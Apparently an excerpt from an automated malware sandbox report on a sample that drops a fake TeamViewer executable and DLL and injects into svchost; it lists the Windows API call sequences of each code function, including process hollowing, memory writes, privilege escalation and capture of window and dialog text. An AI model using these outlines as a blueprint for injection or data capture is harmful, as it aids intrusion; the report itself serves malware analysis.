Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00404853
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00406131
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004A13AA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053E430
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004C97CD
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_00534810
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_005438ED
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_00544B6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_00546FFB
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026CB269
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCE8 appears 68 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF3610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB270 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFADE0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB1F0 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FrostCrashedWindow,FrostCrashedWindow,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,InvertRect,InvertRect,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF18D0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFAE20 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFAD39 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFA500 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFADE0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFB270 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFB1F0 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFAE20 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFAD39 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF18D0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFA500 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,GetComputerNameExW,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,lstrcmp,lstrcmp,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,lstrcmp,lstrcmp,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF18D0 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFAE20 NtOpenThread,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFB270 NtResumeThread,NtClose,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF2640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFADE0 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFB1F0 NtSuspendThread,NtClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFAD39 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFA500 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: No import functions for PE file found
Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
